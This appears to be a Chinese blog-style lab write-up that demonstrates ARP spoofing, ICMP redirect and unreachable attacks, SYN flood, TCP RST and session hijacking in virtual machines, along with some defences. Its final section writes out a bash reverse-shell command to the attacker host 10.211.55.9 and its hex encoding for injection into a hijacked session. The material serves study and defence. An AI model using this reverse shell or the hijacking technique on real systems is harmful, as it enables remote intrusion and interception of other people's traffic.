IE安全(協議棧安全)

ARP僞造攻擊

在局域網中,當想要訪問一臺主機,但是隻知道主機的ip,這時源主機就會在局域網中廣播發送ARP包來學習目的主機的ip對應的mac地址


ARP僞造攻擊就是第三方hacker主機在收到ARP廣播包時,用ARP包中的請求ip連同自己的mac地址發送回去,這樣最初發送ARP請求包的主機就會將hacker主機的mac地址當成請求ip對應的mac地址,這樣就會基於這個假的mac地址就行流量發送,最終流量會通過hacker主機發送到目的主機,而這個過程對於源目主機時不透明的


在這裏插入圖片描述
攻擊前的ARP表
在這裏插入圖片描述
實施攻擊
在這裏插入圖片描述
攻擊後的ARP表
在這裏插入圖片描述
開啓攻擊者kali的網卡轉發功能

vim /etc/sysctl.conf //編輯sysctl.conf net.ipv4.ip_forward = 1 //設置爲1 sysctl -p /etc/sysctl.conf //立即生效不需要重啓 cat /proc/sys/net/ipv4/ip_forward //查看值是否爲1,爲1表示修改完成,爲0表示沒有修改
開啓了網卡轉發受害主機發送到目標主機的數據包回經過攻擊者主機轉發出去,這樣攻擊者就獲得了受
害主機的通訊數據

抓包
正常沒有ARP欺騙時,在hacker端抓取不到流量
在這裏插入圖片描述
實施了ARP欺騙後,在hacker端可以抓取到icmp重定向的流量
在這裏插入圖片描述


ARP防禦

  • 主機中手動建立靜態ARP表
  • 主機中用ARP防火牆來固化ARP表
  • 交換機中啓用DAI技術(動態ARP檢測技術)

DAI交換機會主動記錄主機的ARP信息,來獲得主機的ip、mac、vlan、接口的綁定信息,然後會根據這些綁定的信息來查看主機發出ARP的信息與綁定信息是否吻合;吻合就放行,不吻合就丟棄或者關閉該接口

arp沒有認證機制DAI相當於做了一套認證機制來防禦arp攻擊


ICMP重定向防禦
一般情況下現有網絡的設計是很少發出重定向,那麼我們可以禁止網關發出重定向消息,主機不處理重定向。

ICMP重定向攻擊

ICMP重定向報文是ICMP控制報文中的一種。在特定的情況下,當路由器檢測到一臺機器使用非優化路由的時候,它會向該主機發送一個ICMP重定向報文,請求主機改變路由。路由器也會把初始數據向它的目的地轉發


ICMP重定向攻擊是同一廣播域分hacker主機,它通過僞裝發送主機的網關,向主機發送ICMP重定向報文,重定向地址指向自己,那麼發送主機的流量會根據僞裝的重定向報文被重定向到hacker主機進行中轉,這樣hacker主機就可以對流量進行一系列操作,但是這個過程對於源目主機是不透明的


在這裏我用兩臺虛擬機進行演示,一臺爲hacker主機,一臺爲訪問外網的被攻擊主機
hacker主機的ip爲10.211.55.9
在這裏插入圖片描述
被攻擊主機的ip爲10.211.55.14
在這裏插入圖片描述
正常未攻擊時,被攻擊主機訪問外網,在hacker主機抓包查看
在這裏插入圖片描述
開始攻擊
在這裏插入圖片描述
hacker攻擊被攻擊主機後,在hacker主機抓包查看
在這裏插入圖片描述

ICMP不可達攻擊

ICMP不可達攻擊是指icmp重定向後的地址是個被攻擊主機不可達的地址


未攻擊前,被攻擊主機訪問外網
在這裏插入圖片描述
開始攻擊
在這裏插入圖片描述
攻擊後,被攻擊主機訪問外網
在這裏插入圖片描述
出現成功返回延時以及不可達的兩種情況,可能是攻擊強度不夠,但是也可以驗證攻擊起作用了


ICMP不可達攻擊防禦
增加服務斷開的判斷機制,做多重判斷,不能僅從icmp不可達來判斷失去連接從而斷開服務。

TCP syn攻擊

正常的TCP建立會經歷三次握手過程
在這裏插入圖片描述
首先客戶端會給服務端發送syn,接着服務端會向客戶端發送syn+ack
正常情況下,客戶端應該給服務端發送ack TCP建立就完成了


TCP syn攻擊是指客戶端給服務端發送了大量的TCP syn請求,但是並不進行最後的ack確認;這樣大量的syn會存放在服務端給開闢的緩存表中,當緩存表被syn填滿之後,正常的TCP連接請求就因爲緩存表滿了而無法進行


這裏我用三臺虛擬機進行測試,一臺爲攻擊主機,一臺爲客戶端,一臺爲服務端
爲了產生TCP連接過程,在這裏我使用telnet這個協議來產生TCP連接;讓服務端telnet客戶端
開始攻擊
在這裏插入圖片描述
攻擊效果
在這裏插入圖片描述
服務端telnet客戶端的命令行界面卡死了


這個技術被防火牆用來拒絕用戶訪問某些受限制的網站

TCP rst攻擊

正常的服務端和客戶端的TCP連接可以通過發送TCP rst來重置TCP連接,這樣就會使得TCP連接直接斷開


TCP rst攻擊就是利用了這一點
在這裏插入圖片描述
同局域網的hacker設備通過僞裝成服務端向受害主機發送復位報文,當受害主機收到服務器發出的復位報文就會立即釋放連接並清空緩存


正常情況下,即未攻擊時
在這裏插入圖片描述

設備均處於在線狀態
開始攻擊
在這裏插入圖片描述
查看效果
在這裏插入圖片描述

在這裏插入圖片描述
攻擊後client端直接掛了,服務端的telnet也斷開了

TCP劫持攻擊

在這裏插入圖片描述
hacker抓取包,瞭解到server與client之間的會話內容;然後僞造TCP包,僞造的包中二層的源Mac是hacker機,三層的源ip是client的ip 目標ip是server的ip,server判斷會話只能通過三四層的信息


首先server端telnet連接到client端,通過wireshark進行抓包
在這裏插入圖片描述
在這裏插入圖片描述
開始攻擊
在這裏插入圖片描述
查看結果在這裏插入圖片描述
在這裏插入圖片描述
server端已經卡死 說明劫持成功,我的16進制轉換代碼內容爲mkdir tcp;在client上發現創建tcp成功

TCP 反彈shell

在這裏插入圖片描述
如上圖,一般只有server會通過nat將服務端口映射到公網,而給server提供數據支撐的數據server卻並沒有映射到公網,只存在於私網中,那麼hacker無法通過網絡觸及到私網中的數據server;這時hacker會先通過監聽server與數據server的tcp會話,然後給數據server注入一個反彈shell,這個反彈shell可以使得數據server從私網出去主動連接hacker


開啓兩個kali的ssh會話,一個用於監聽端口,一個用於攻擊受害主機
在這裏插入圖片描述
攻擊代碼:
bash -i>&/dev/tcp/10.211.55.9/8888 0>&1
轉換後的16進制
62617368202d693e262f6465762f7463702f31302e3231312e35352e392f3838383820303e26310d00
先獲取會話包
在這裏插入圖片描述
開始攻擊
在這裏插入圖片描述
查看結果
在這裏插入圖片描述
client主動連接上了kali,這時就可以爲所欲爲了

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章